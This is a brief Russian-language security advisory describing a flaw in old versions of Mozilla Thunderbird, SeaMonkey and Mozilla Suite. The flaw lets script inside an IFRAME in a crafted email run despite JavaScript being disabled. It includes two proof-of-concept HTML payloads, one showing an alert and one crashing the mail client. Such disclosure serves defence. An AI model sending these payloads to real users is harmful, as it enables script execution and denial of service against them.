Программа:
Mozilla Thunderbird 1.5.0.2, 1.0.8
Mozilla SeaMonkey 1.0.1
Mozilla Suite 1.7.13
Уязвимость позволяет злоумышленнику выполнить произвольный код или вызвать отказ в обслуживании. Уязвимость существует из-за ошибки, позволяющей атакующему выполнить произвольный JavaScript сценарий, даже если выполнение JavaScript запрещено в настройках пользователя. Атакующий может выполнить произвольный JavaScript сценарий, если отправит специально составленное письмо пользователю, содержащее сценарий в IFRAME, и пользователь попытается ответить на письмо.
Примеры:
Выполнение Javascript :
<html>
<body>
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body>
</html>
DoS атака (крах приложения):
<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com!')"></iframe>
</body>
</html>
